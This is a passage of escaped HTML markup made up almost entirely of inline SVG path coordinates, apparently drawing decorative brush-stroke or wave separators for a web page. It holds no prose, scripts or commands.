d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78